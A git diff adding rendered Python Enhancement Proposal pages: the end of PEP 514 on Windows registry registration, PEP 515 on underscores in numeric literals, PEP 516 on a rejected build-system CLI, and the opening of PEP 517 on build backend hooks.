+            print('SysVersion:', get_value(tag_key, 'SysVersion') or tag[:3])
+            # Architecture is unknown because we are in HKCU
+            # Tools may use alternate approaches to determine architecture when
+            # the registration does not specify it.
+            print('SysArchitecture:', get_value(tag_key, 'SysArchitecture') or '(unknown)')
+
+        try:
+            ip_key = winreg.OpenKey(company_key, tag + '\\InstallPath')
+        except FileNotFoundError:
+            pass
+        else:
+            with ip_key:
+                ip = get_value(ip_key, None)
+                exe = get_value(ip_key, 'ExecutablePath') or os.path.join(ip, 'python.exe')
+                exew = get_value(ip_key, 'WindowedExecutablePath') or os.path.join(ip, 'python.exe')
+                print('InstallPath:', ip)
+                print('ExecutablePath:', exe)
+                print('WindowedExecutablePath:', exew)
+        print()
+
+
+

This example shows a subset of the registration that will be created by a +just-for-me install of 64-bit Python 3.6.0. Other keys may also be created:

+
HKEY_CURRENT_USER\Software\Python\PythonCore
+    (Default) = (value not set)
+    DisplayName = "Python Software Foundation"
+    SupportUrl = "http://www.python.org/"
+
+HKEY_CURRENT_USER\Software\Python\PythonCore\3.6
+    (Default) = (value not set)
+    DisplayName = "Python 3.6 (64-bit)"
+    SupportUrl = "http://www.python.org/"
+    Version = "3.6.0"
+    SysVersion = "3.6"
+    SysArchitecture = "64bit"
+
+HKEY_CURRENT_USER\Software\Python\PythonCore\3.6\Help\Main Python Documentation
+    (Default) = "C:\Users\Me\AppData\Local\Programs\Python\Python36\Doc\python360.chm"
+    DisplayName = "Python 3.6.0 Documentation"
+
+HKEY_CURRENT_USER\Software\Python\PythonCore\3.6\InstallPath
+    (Default) = "C:\Users\Me\AppData\Local\Programs\Python\Python36\"
+    ExecutablePath = "C:\Users\Me\AppData\Local\Programs\Python\Python36\python.exe"
+    WindowedExecutablePath = "C:\Users\Me\AppData\Local\Programs\Python\Python36\pythonw.exe"
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0514.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0515/index.html b/pep-0515/index.html new file mode 100644 index 00000000000..63092ae7094 --- /dev/null +++ b/pep-0515/index.html @@ -0,0 +1,344 @@ + + + + + + + + PEP 515 – Underscores in Numeric Literals | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 515 – Underscores in Numeric Literals

+
+
Author:
+
Georg Brandl, Serhiy Storchaka
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2016
+
Python-Version:
+
3.6
+
Post-History:
+
10-Feb-2016, 11-Feb-2016
+
+
+
+
Table of Contents +
+
+

Abstract and Rationale

+

This PEP proposes to extend Python’s syntax and number-from-string +constructors so that underscores can be used as visual separators for +digit grouping purposes in integral, floating-point and complex number +literals.

+

This is a common feature of other modern languages, and can aid +readability of long literals, or literals whose value should clearly +separate into parts, such as bytes or words in hexadecimal notation.

+

Examples:

+
# grouping decimal numbers by thousands
+amount = 10_000_000.0
+
+# grouping hexadecimal addresses by words
+addr = 0xCAFE_F00D
+
+# grouping bits into nibbles in a binary literal
+flags = 0b_0011_1111_0100_1110
+
+# same, for string conversions
+flags = int('0b_1111_0000', 2)
+
+
+
+
+

Specification

+

The current proposal is to allow one underscore between digits, and +after base specifiers in numeric literals. The underscores have no +semantic meaning, and literals are parsed as if the underscores were +absent.

+
+

Literal Grammar

+

The production list for integer literals would therefore look like +this:

+
integer: decinteger | bininteger | octinteger | hexinteger
+decinteger: nonzerodigit (["_"] digit)* | "0" (["_"] "0")*
+bininteger: "0" ("b" | "B") (["_"] bindigit)+
+octinteger: "0" ("o" | "O") (["_"] octdigit)+
+hexinteger: "0" ("x" | "X") (["_"] hexdigit)+
+nonzerodigit: "1"..."9"
+digit: "0"..."9"
+bindigit: "0" | "1"
+octdigit: "0"..."7"
+hexdigit: digit | "a"..."f" | "A"..."F"
+
+
+

For floating-point and complex literals:

+
floatnumber: pointfloat | exponentfloat
+pointfloat: [digitpart] fraction | digitpart "."
+exponentfloat: (digitpart | pointfloat) exponent
+digitpart: digit (["_"] digit)*
+fraction: "." digitpart
+exponent: ("e" | "E") ["+" | "-"] digitpart
+imagnumber: (floatnumber | digitpart) ("j" | "J")
+
+
+
+
+

Constructors

+

Following the same rules for placement, underscores will be allowed in +the following constructors:

+
    +
  • int() (with any base)
  • +
  • float()
  • +
  • complex()
  • +
  • Decimal()
  • +
+
+
+

Further changes

+

The new-style number-to-string formatting language will be extended to +allow _ as a thousands separator, where currently only , is +supported. This can be used to easily generate code with more +readable literals. [11]

+

The syntax would be the same as for the comma, e.g. {:10_} for a +width of 10 with _ separator.

+

For the b, x and o format specifiers, _ will be +allowed and group by 4 digits.

+
+
+
+

Prior Art

+

Those languages that do allow underscore grouping implement a large +variety of rules for allowed placement of underscores. In cases where +the language spec contradicts the actual behavior, the actual behavior +is listed. (“single” or “multiple” refer to allowing runs of +consecutive underscores.)

+
    +
  • Ada: single, only between digits [8]
  • +
  • C# (open proposal for 7.0): multiple, only between digits [6]
  • +
  • C++14: single, between digits (different separator chosen) [1]
  • +
  • D: multiple, anywhere, including trailing [2]
  • +
  • Java: multiple, only between digits [7]
  • +
  • Julia: single, only between digits (but not in float exponent parts) +[9]
  • +
  • Perl 5: multiple, basically anywhere, although docs say it’s +restricted to one underscore between digits [3]
  • +
  • Ruby: single, only between digits (although docs say “anywhere”) +[10]
  • +
  • Rust: multiple, anywhere, except for between exponent “e” and digits +[4]
  • +
  • Swift: multiple, between digits and trailing (although textual +description says only “between digits”) [5]
  • +
+
+
+

Alternative Syntax

+
+

Underscore Placement Rules

+

Instead of the relatively strict rule specified above, the use of +underscores could be less limited. As seen in other languages, common +rules include:

+
    +
  • Only one consecutive underscore allowed, and only between digits.
  • +
  • Multiple consecutive underscores allowed, but only between digits.
  • +
  • Multiple consecutive underscores allowed, in most positions except +for the start of the literal, or special positions like after a +decimal point.
  • +
+

The syntax in this PEP has ultimately been selected because it covers +the common use cases, and does not allow for syntax that would have to +be discouraged in style guides anyway.

+

A less common rule would be to allow underscores only every N digits +(where N could be 3 for decimal literals, or 4 for hexadecimal ones). +This is unnecessarily restrictive, especially considering the +separator placement is different in different cultures.

+
+
+

Different Separators

+

A proposed alternate syntax was to use whitespace for grouping. +Although strings are a precedent for combining adjoining literals, the +behavior can lead to unexpected effects which are not possible with +underscores. Also, no other language is known to use this rule, +except for languages that generally disregard any whitespace.

+

C++14 introduces apostrophes for grouping (because underscores +introduce ambiguity with user-defined literals), which is not +considered because of the use in Python’s string literals. [1]

+
+
+
+

Implementation

+

A preliminary patch that implements the specification given above has +been posted to the issue tracker. [12]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0515.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0516/index.html b/pep-0516/index.html new file mode 100644 index 00000000000..af77ffb6f0f --- /dev/null +++ b/pep-0516/index.html @@ -0,0 +1,584 @@ + + + + + + + + PEP 516 – Build system abstraction for pip/conda etc | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 516 – Build system abstraction for pip/conda etc

+
+
Author:
+
Robert Collins <rbtcollins at hp.com>, +Nathaniel J. Smith <njs at pobox.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
26-Oct-2015
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a programmatic interface for pip [1] and other +distribution or installation tools to use when working with Python +source trees (both the developer tree - e.g. the git tree - and source +distributions).

+

The programmatic interface allows decoupling of pip from its current +hard dependency on setuptools [2] able for two +key reasons:

+
    +
  1. It enables new build systems that may be much easier to use without +requiring them to even appear to be setuptools.
  2. +
  3. It facilitates setuptools itself changing its user interface without +breaking pip, giving looser coupling.
  4. +
+

The interface needed to permit pip to install build systems also enables pip to +install build time requirements for packages which is an important step in +getting pip to full feature parity with the installation components of +easy-install.

+

As PEP 426 is draft, we cannot utilise the metadata format it +defined. However PEP 427 wheels are in wide use and fairly well specified, so +we have adopted the METADATA format from that for specifying distribution +dependencies and general project metadata. PEP 508 provides a +self-contained language for describing a dependency, which we encapsulate in a +thin JSON schema to describe bootstrap dependencies.

+

Since Python sdists specified in PEP 314 are also source trees, this +PEP is updating the definition of sdists.

+
+
+

PEP Rejection

+

The CLI based approach proposed in this PEP has been rejected in favour of the +Python API based approach proposed in PEP 517. The specific CLI used to +communicate with build backends running as isolated subprocesses will be +considered an implementation detail of front-end developer tool implementations.

+
+
+

Motivation

+

There is significant pent-up frustration in the Python packaging ecosystem +around the current lock-in between build system and pip. Breaking that lock-in +is better for pip, for setuptools, and for other build systems like flit +[3].

+
+
+

Specification

+
+

Overview

+

Build tools will be located by reading a file pypa.json from the root +directory of the source tree. That file describes how to get the build tool +and the name of the command to run to invoke the tool.

+

All tools will be expected to conform to a single command line interface +modelled on pip’s existing use of the setuptools setup.py interface.

+
+
+

pypa.json

+

The file pypa.json acts as a neutral configuration file for pip and other +tools that want to build source trees to consult for configuration. The +absence of a pypa.json file in a Python source tree implies a setuptools +or setuptools compatible build system.

+

The JSON has the following schema. Extra keys are ignored, which permits the +use of pypa.json as a configuration file for other related tools. If doing +that the chosen keys must be namespaced under tools:

+
{"tools": {"flit": ["Flits content here"]}}
+
+
+
+
schema
The version of the schema. This PEP defines version “1”. Defaults to “1” +when absent. All tools reading the file must error on an unrecognised +schema version.
+
bootstrap_requires
Optional list of PEP 508 dependency specifications that must be +installed before running the build tool. For instance, if using flit, then +the requirements might be:
bootstrap_requires: ["flit"]
+
+
+
+
build_command
A mandatory key, this is a list of Python format strings [8] +describing the command to run. For instance, if using flit then the build +command might be:
build_command: ["flit"]
+
+
+

If using a command which is a runnable module fred:

+
build_command: ["{PYTHON}", "-m", "fred"]
+
+
+
+
+
+
+

Process interface

+

The command to run is defined by a simple Python format string [8].

+

This permits build systems with dedicated scripts and those that are invoked +using “python -m somemodule”.

+

Processes will be run with the current working directory set to the root of +the source tree.

+

When run, processes should not read from stdin - while pip currently runs +build systems with stdin connected to its own stdin, stdout and stderr are +redirected and no communication with the user is possible.

+

As usual with processes, a non-zero exit status indicates an error.

+
+
+

Available format variables

+
+
PYTHON
The Python interpreter in use. This is important to enable calling things +which are just Python entry points.
+
{PYTHON} -m foo
+
+
+
+
+

Available environment variables

+

These variables are set by the caller of the build system and will always be +available.

+
+
PATH
The standard system path.
+
PYTHON
As for format variables.
+
PYTHONPATH
Used to control sys.path per the normal Python mechanisms.
+
+
+
+

Subcommands

+

There are a number of separate subcommands that build systems must support. +The examples below use a build_command of flit for illustrative purposes.

+
+
build_requires
Query build requirements. Build requirements are returned as a UTF-8 +encoded JSON document with one key build_requires consisting of a list +of PEP 508 dependency specifications. Additional keys must be +ignored. The build_requires command is the only command run without +setting up a build environment.

Example command:

+
flit build_requires
+
+
+
+
metadata
Query project metadata. The metadata and only the metadata should +be output on stdout in UTF-8 encoding. pip would run metadata just once to +determine what other packages need to be downloaded and installed. The +metadata is output as a wheel METADATA file per PEP 427.

Note that the metadata generated by the metadata command, and the metadata +present in a generated wheel must be identical.

+

Example command:

+
flit metadata
+
+
+
+
wheel -d OUTPUT_DIR
Command to run to build a wheel of the project. OUTPUT_DIR will point to +an existing directory where the wheel should be output. Stdout and stderr +have no semantic meaning. Only one file should be output - if more are +output then pip would pick an arbitrary one to consume.

Example command:

+
flit wheel -d /tmp/pip-build_1234
+
+
+
+
develop [–prefix PREFIX]
Command to do an in-place ‘development’ installation of the project. +Stdout and stderr have no semantic meaning.

Not all build systems will be able to perform develop installs. If a build +system cannot do develop installs, then it should error when run. Note +that doing so will cause use operations like pip install -e foo to +fail.

+

The prefix option is used for defining an alternative prefix for the +installation. While setuptools has --root and --user options, +they can be done equivalently using --prefix, and pip or other +tools that accept --root or --user options should translate +appropriately.

+

The root option is used to define an alternative root within which the +command should operate.

+

For instance:

+
flit develop --root /tmp/ --prefix /usr/local
+
+
+

Should install scripts within /tmp/usr/local/bin, even if the Python +environment in use reports that the sys.prefix is /usr/ which would +lead to using /tmp/usr/bin/. +Similar logic applies for package files etc.

+
+
+
+
+

The build environment

+

Except for the build_requires command, all commands are run within a build +environment. No specific implementation is required, but a build environment +must achieve the following requirements.

+
    +
  1. All dependencies specified by the project’s build_requires must be +available for import from within $PYTHON.
  2. +
+
    +
  1. All command-line scripts provided by the build-required packages must be +present in $PATH.
  2. +
+

A corollary of this is that build systems cannot assume access to any Python +package that is not declared as a build_requires or in the Python standard +library.

+
+
+

Hermetic builds

+

This specification does not prescribe whether builds should be hermetic or not. +Existing build tools like setuptools will use installed versions of build time +requirements (e.g. setuptools_scm) and only install other versions on version +conflicts or missing dependencies. However its likely that better consistency +can be created by always isolation builds and using only the specified dependencies.

+

However, there are nuanced problems there - such as how can users force the +avoidance of a bad version of a build requirement which meets some packages +dependencies. Future PEPs may tackle this problem, but it is not currently in +scope - it does not affect the metadata required to coordinate between build +systems and things that need to do builds, and thus is not PEP material.

+
+
+

Upgrades

+

‘pypa.json’ is versioned to permit future changes without requiring +compatibility.

+

The sequence for upgrading either of schemas in a new PEP will be:

+
    +
  1. Issue new PEP defining an updated schema. If the schema is not entirely +backward compatible then a new version number must be defined.
  2. +
  3. Consumers (e.g. pip) implement support for the new schema version.
  4. +
  5. Package authors opt into the new schema when they are happy to introduce a +dependency on the version of ‘pip’ (and potentially other consumers) that +introduced support for the new schema version.
  6. +
+

The same process will take place for the initial deployment of this PEP:- +the propagation of the capability to use this PEP without a setuptools shim +will be largely gated by the adoption rate of the first version of pip that +supports it.

+
+
+

Static metadata in sdists

+

This PEP does not tackle the current inability to trust static metadata in +sdists. That is a separate problem to identifying and consuming the build +system that is in use in a source tree, whether it came from an sdist or not.

+
+
+

Handling of compiler options

+

Handling of different compiler options is out of scope for this specification.

+

pip currently handles compiler options by appending user supplied strings to +the command line it runs when running setuptools. This approach is sufficient +to work with the build system interface defined in this PEP, with the +exception that globally specified options will stop working globally as +different build systems evolve. That problem can be solved in pip (or conda or +other installers) without affecting interoperability.

+

In the long term, wheels should be able to express the difference between +wheels built with one compiler or options vs another, and that is PEP +material.

+
+
+
+

Examples

+

An example ‘pypa.json’ for using flit:

+
{"bootstrap_requires": ["flit"],
+ "build_command": "flit"}
+
+
+

When ‘pip’ reads this it would prepare an environment with flit in it before +trying to use flit.

+

Because flit doesn’t have setup-requires support today, +flit build_requires would just output a constant string:

+
{"build_requires": []}
+
+
+

flit metadata would interrogate flit.ini and marshal the metadata into +a wheel METADATA file and output that on stdout.

+

flit wheel would need to accept a -d parameter that tells it where to +output the wheel (pip needs this).

+
+
+

Backwards Compatibility

+

Older pips will remain unable to handle alternative build systems. +This is no worse than the status quo - and individual build system +projects can decide whether to include a shim setup.py or not.

+

All existing build systems that can product wheels and do develop installs +should be able to run under this abstraction and will only need a specific +adapter for them constructed and published on PyPI.

+

In the absence of a pypa.json file, tools like pip should assume a +setuptools build system and use setuptools commands directly.

+
+

Network effects

+

Projects that adopt build systems that are not setuptools compatible - that +is that they have no setup.py, or the setup.py doesn’t accept commands that +existing tools try to use - will not be installable by those existing tools.

+

Where those projects are used by other projects, this effect will cascade.

+

In particular, because pip does not handle setup-requires today, any project +(A) that adopts a setuptools-incompatible build system and is consumed as a +setup-requirement by a second project (B) which has not itself transitioned to +having a pypa.json will make B uninstallable by any version of pip. This is +because setup.py in B will trigger easy-install when ‘setup.py egg_info’ is +run by pip, and that will try and fail to install A.

+

As such we recommend that tools which are currently used as setup-requires +either ensure that they keep a setuptools shim or find their consumers and +get them all to upgrade to the use of a pypa.json in advance of moving +themselves. Pragmatically that is impossible, so the advice is to keep a +setuptools shim indefinitely - both for projects like pbr, setuptools_scm and +also projects like numpy.

+
+
+

setuptools shim

+

It would be possible to write a generic setuptools shim that looks like +setup.py and under the hood uses pypa.json to drive the builds. This +is not needed for pip to use the system, but would allow package authors to +use the new features while still retaining compatibility with older pip +versions.

+
+
+
+

Rationale

+

This PEP started with a long mailing list thread on distutils-sig [6]. +Subsequent to that an online meeting was held to debug all the positions folk +had. Minutes from that were posted to the list [7].

+

This specification is a translation of the consensus reached there into PEP +form, along with some arbitrary choices on the minor remaining questions.

+

The basic heuristic for the design has been to focus on introducing an +abstraction without requiring development not strictly tied to the +abstraction. Where the gap is small to improvements, or the cost of using the +existing interface is very high, then we’ve taken on having the improvement as +a dependency, but otherwise deferred such to future iterations.

+

We chose wheel METADATA files rather than defining a new specification, +because pip can already handle wheel .dist-info directories which encode all +the necessary data in a METADATA file. PEP 426 can’t be used as it’s still +draft, and defining a new metadata format, while we should do that, is a +separate problem. Using a directory on disk would not add any value to the +interface (pip has to do that today due to limitations in the setuptools +CLI).

+

The use of ‘develop’ as a command is because there is no PEP specifying the +interoperability of things that do what ‘setuptools develop’ does - so we’ll +need to define that before pip can take on the responsibility for doing the +‘develop’ step. Once that’s done we can issue a successor PEP to this one.

+

The use of a command line API rather than a Python API is a little +contentious. Fundamentally anything can be made to work, and the pip +maintainers have spoken strongly in favour of retaining a process based +interface - something that is mature and robust in pip today.

+

The choice of JSON as a file format is a compromise between several +constraints. Firstly there is no stdlib YAML interpreter, nor one for any of +the other low-friction structured file formats. Secondly, INIParser is a poor +format for a number of reasons, primarily that it has very minimal structure - +but pip’s maintainers are not fond of it. JSON is in the stdlib, has +sufficient structure to permit embedding anything we want in future without +requiring embedded DSL’s.

+

Donald suggested using setup.cfg and the existing setuptools command line +rather than inventing something new. While that would permit interoperability +with less visible changes, it requires nearly as much engineering on the pip +side - looking for the new key in setup.cfg, implementing the non-installed +environments to run the build in. And the desire from other build system +authors not to confuse their users by delivering something that looks like but +behaves quite differently to setuptools seems like a bigger issue than pip +learning how to invoke a custom build tool.

+

The metadata and wheel commands are required to have consistent metadata to +avoid a race condition that could otherwise happen where pip reads the +metadata, acts on it, and then the resulting wheel has incompatible +requirements. That race is exploited today by packages using PEP 426 +environment markers, to work with older pip versions that do not support +environment markers. That exploit is not needed with this PEP, because either +the setuptools shim is in use (with older pip versions), or an environment +marker ready pip is in use. The setuptools shim can take care of exploiting +the difference older pip versions require.

+

We discussed having an sdist verb. The main driver for this was to make sure +that build systems were able to produce sdists that pip can build - but this is +circular: the whole point of this PEP is to let pip consume such sdists or VCS +source trees reliably and without requiring an implementation of setuptools. +Being able to create new sdists from existing source trees isn’t a thing pip +does today, and while there is a PR to do that as part of building from +source, it is contentious and lacks consensus. Rather than impose a +requirement on all build systems, we are treating it as a YAGNI, and will add +such a verb in a future version of the interface if required. The existing +PEP 314 requirements for sdists still apply, and distutils or setuptools +users can use setup.py sdist to create an sdist. Other tools should create +sdists compatible with PEP 314. Note that pip itself does not require +PEP 314 compatibility - it does not use any of the metadata from sdists - they +are treated like source trees from disk or version control.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0516.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0517/index.html b/pep-0517/index.html new file mode 100644 index 00000000000..e33cc78ec80 --- /dev/null +++ b/pep-0517/index.html @@ -0,0 +1,1099 @@ + + + + + + + + PEP 517 – A build-system independent format for source trees | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 517 – A build-system independent format for source trees

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>, +Thomas Kluyver <thomas at kluyver.me.uk>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
30-Sep-2015
+
Post-History:
+
01-Oct-2015, 25-Oct-2015, 19-May-2017, 11-Sep-2017
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

While distutils / setuptools have taken us a long way, they +suffer from three serious problems: (a) they’re missing important +features like usable build-time dependency declaration, +autoconfiguration, and even basic ergonomic niceties like DRY-compliant +version number management, and (b) extending them is difficult, so +while there do exist various solutions to the above problems, they’re +often quirky, fragile, and expensive to maintain, and yet (c) it’s +very difficult to use anything else, because distutils/setuptools +provide the standard interface for installing packages expected by +both users and installation tools like pip.

+

Previous efforts (e.g. distutils2 or setuptools itself) have attempted +to solve problems (a) and/or (b). This proposal aims to solve (c).

+

The goal of this PEP is get distutils-sig out of the business of being +a gatekeeper for Python build systems. If you want to use distutils, +great; if you want to use something else, then that should be easy to +do using standardized methods. The difficulty of interfacing with +distutils means that there aren’t many such systems right now, but to +give a sense of what we’re thinking about see flit or bento. Fortunately, wheels have now +solved many of the hard problems here – e.g. it’s no longer necessary +that a build system also know about every possible installation +configuration – so pretty much all we really need from a build system +is that it have some way to spit out standard-compliant wheels and +sdists.

+

We therefore propose a new, relatively minimal interface for +installation tools like pip to interact with package source trees +and source distributions.

+
+
+

Terminology and goals

+

A source tree is something like a VCS checkout. We need a standard +interface for installing from this format, to support usages like +pip install some-directory/.

+

A source distribution is a static snapshot representing a particular +release of some source code, like lxml-3.4.4.tar.gz. Source +distributions serve many purposes: they form an archival record of +releases, they provide a stupid-simple de facto standard for tools +that want to ingest and process large corpora of code, possibly +written in many languages (e.g. code search), they act as the input to +downstream packaging systems like Debian/Fedora/Conda/…, and so +forth. In the Python ecosystem they additionally have a particularly +important role to play, because packaging tools like pip are able +to use source distributions to fulfill binary dependencies, e.g. if +there is a distribution foo.whl which declares a dependency on +bar, then we need to support the case where pip install bar or +pip install foo automatically locates the sdist for bar, +downloads it, builds it, and installs the resulting package.

+

Source distributions are also known as sdists for short.

+

A build frontend is a tool that users might run that takes arbitrary +source trees or source distributions and builds wheels from them. The +actual building is done by each source tree’s build backend. In a +command like pip wheel some-directory/, pip is acting as a build +frontend.

+

An integration frontend is a tool that users might run that takes a +set of package requirements (e.g. a requirements.txt file) and +attempts to update a working environment to satisfy those +requirements. This may require locating, building, and installing a +combination of wheels and sdists. In a command like pip install +lxml==2.4.0, pip is acting as an integration frontend.

+
+
+

Source trees

+

There is an existing, legacy source tree format involving +setup.py. We don’t try to specify it further; its de facto +specification is encoded in the source code and documentation of +distutils, setuptools, pip, and other tools. We’ll refer +to it as the setup.py-style.

+

Here we define a new style of source tree based around the +pyproject.toml file defined in PEP 518, extending the +[build-system] table in that file with one additional key, +build-backend. Here’s an example of how it would look:

+
[build-system]
+# Defined by PEP 518:
+requires = ["flit"]
+# Defined by this PEP:
+build-backend = "flit.api:main"
+
+
+

build-backend is a string naming a Python object that will be +used to perform the build (see below for details). This is formatted +following the same module:object syntax as a setuptools entry +point. For instance, if the string is "flit.api:main" as in the +example above, this object would be looked up by executing the +equivalent of:

+
import flit.api
+backend = flit.api.main
+
+
+

It’s also legal to leave out the :object part, e.g.

+
build-backend = "flit.api"
+
+
+

which acts like:

+
import flit.api
+backend = flit.api
+
+
+

Formally, the string should satisfy this grammar:

+
identifier = (letter | '_') (letter | '_' | digit)*
+module_path = identifier ('.' identifier)*
+object_path = identifier ('.' identifier)*
+entry_point = module_path (':' object_path)?
+
+
+

And we import module_path and then lookup +module_path.object_path (or just module_path if +object_path is missing).

+

When importing the module path, we do not look in the directory containing the +source tree, unless that would be on sys.path anyway (e.g. because it is +specified in PYTHONPATH). Although Python automatically adds the working +directory to sys.path in some situations, code to resolve the backend should +not be affected by this.

+

If the pyproject.toml file is absent, or the build-backend +key is missing, the source tree is not using this specification, and +tools should revert to the legacy behaviour of running setup.py (either +directly, or by implicitly invoking the setuptools.build_meta:__legacy__ +backend).

+

Where the build-backend key exists, this takes precedence and the source tree follows the format and +conventions of the specified backend (as such no setup.py is needed unless the backend requires it). +Projects may still wish to include a setup.py for compatibility with tools that do not use this spec.

+

This PEP also defines a backend-path key for use in pyproject.toml, see +the “In-Tree Build Backends” section below. This key would be used as follows:

+
[build-system]
+# Defined by PEP 518:
+requires = ["flit"]
+# Defined by this PEP:
+build-backend = "local_backend"
+backend-path = ["backend"]
+
+
+
+

Build requirements

+

This PEP places a number of additional requirements on the “build requirements” +section of pyproject.toml. These are intended to ensure that projects do +not create impossible to satisfy conditions with their build requirements.

+
    +
  • Project build requirements will define a directed graph of requirements +(project A needs B to build, B needs C and D, etc.) This graph MUST NOT +contain cycles. If (due to lack of co-ordination between projects, for +example) a cycle is present, front ends MAY refuse to build the project.
  • +
  • Where build requirements are available as wheels, front ends SHOULD use these +where practical, to avoid deeply nested builds. However front ends MAY have +modes where they do not consider wheels when locating build requirements, and +so projects MUST NOT assume that publishing wheels is sufficient to break a +requirement cycle.
  • +
  • Front ends SHOULD check explicitly for requirement cycles, and terminate +the build with an informative message if one is found.
  • +
+

Note in particular that the requirement for no requirement cycles means that +backends wishing to self-host (i.e., building a wheel for a backend uses that +backend for the build) need to make special provision to avoid causing cycles. +Typically this will involve specifying themselves as an in-tree backend, and +avoiding external build dependencies (usually by vendoring them).

+
+
+
+

Build backend interface

+

The build backend object is expected to have attributes which provide +some or all of the following hooks. The common config_settings +argument is described after the individual hooks.

+
+

Mandatory hooks

+
+

build_wheel

+
def build_wheel(wheel_directory, config_settings=None, metadata_directory=None):
+    ...
+
+
+

Must build a .whl file, and place it in the specified wheel_directory. It +must return the basename (not the full path) of the .whl file it creates, +as a unicode string.

+

If the build frontend has previously called prepare_metadata_for_build_wheel +and depends on the wheel resulting from this call to have metadata +matching this earlier call, then it should provide the path to the created +.dist-info directory as the metadata_directory argument. If this +argument is provided, then build_wheel MUST produce a wheel with identical +metadata. The directory passed in by the build frontend MUST be +identical to the directory created by prepare_metadata_for_build_wheel, +including any unrecognized files it created.

+

Backends which do not provide the prepare_metadata_for_build_wheel hook may +either silently ignore the metadata_directory parameter to build_wheel, +or else raise an exception when it is set to anything other than None.

+

To ensure that wheels from different sources are built the same way, frontends +may call build_sdist first, and then call build_wheel in the unpacked +sdist. But if the backend indicates that it is missing some requirements for +creating an sdist (see below), the frontend will fall back to calling +build_wheel in the source directory.

+

The source directory may be read-only. Backends should therefore be +prepared to build without creating or modifying any files in the source +directory, but they may opt not to handle this case, in which case +failures will be visible to the user. Frontends are not responsible for +any special handling of read-only source directories.

+

The backend may store intermediate artifacts in cache locations or +temporary directories. The presence or absence of any caches should not +make a material difference to the final result of the build.

+
+
+

build_sdist

+
def build_sdist(sdist_directory, config_settings=None):
+    ...
+
+
+

Must build a .tar.gz source distribution and place it in the specified +sdist_directory. It must return the basename (not the full path) of the +.tar.gz file it creates, as a unicode string.

+

A .tar.gz source distribution (sdist) contains a single top-level directory called +{name}-{version} (e.g. foo-1.0), containing the source files of the +package. This directory must also contain the +pyproject.toml from the build directory, and a PKG-INFO file containing +metadata in the format described in +PEP 345. Although historically +zip files have also been used as sdists, this hook should produce a gzipped +tarball. This is already the more common format for sdists, and having a +consistent format makes for simpler tooling.

+

The generated tarball should use the modern POSIX.1-2001 pax tar format, which +specifies UTF-8 based file names. This is not yet the default for the tarfile +module shipped with Python 3.6, so backends using the tarfile module need to +explicitly pass format=tarfile.PAX_FORMAT.

+

Some backends may have extra requirements for creating sdists, such as version +control tools. However, some frontends may prefer to make intermediate sdists +when producing wheels, to ensure consistency. +If the backend cannot produce an sdist because a dependency is missing, or +for another well understood reason, it should raise an exception of a specific +type which it makes available as UnsupportedOperation on the backend object. +If the frontend gets this exception while building an sdist as an intermediate +for a wheel, it should fall back to building a wheel directly. +The backend does not need to define this exception type if it would never raise +it.

+
+
+
+

Optional hooks

+
+

get_requires_for_build_wheel

+
def get_requires_for_build_wheel(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional list of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file, to be installed when calling the build_wheel or +prepare_metadata_for_build_wheel hooks.

+

Example:

+
def get_requires_for_build_wheel(config_settings):
+    return ["wheel >= 0.25", "setuptools"]
+
+
+

If not defined, the default implementation is equivalent to return [].

+
+
+

prepare_metadata_for_build_wheel

+
def prepare_metadata_for_build_wheel(metadata_directory, config_settings=None):
+    ...
+
+
+

Must create a .dist-info directory containing wheel metadata +inside the specified metadata_directory (i.e., creates a directory +like {metadata_directory}/{package}-{version}.dist-info/). This +directory MUST be a valid .dist-info directory as defined in the +wheel specification, except that it need not contain RECORD or +signatures. The hook MAY also create other files inside this +directory, and a build frontend MUST preserve, but otherwise ignore, such files; +the intention +here is that in cases where the metadata depends on build-time +decisions, the build backend may need to record these decisions in +some convenient format for re-use by the actual wheel-building step.

+

This must return the basename (not the full path) of the .dist-info +directory it creates, as a unicode string.

+

If a build frontend needs this information and the method is +not defined, it should call build_wheel and look at the resulting +metadata directly.

+
+
+

get_requires_for_build_sdist

+
def get_requires_for_build_sdist(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional list of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file. These dependencies will be installed when calling the +build_sdist hook.

+

If not defined, the default implementation is equivalent to return [].

+
+

Note

+

Editable installs

+

This PEP originally specified another hook, install_editable, to do an +editable install (as with pip install -e). It was removed due to the +complexity of the topic, but may be specified in a later PEP.

+

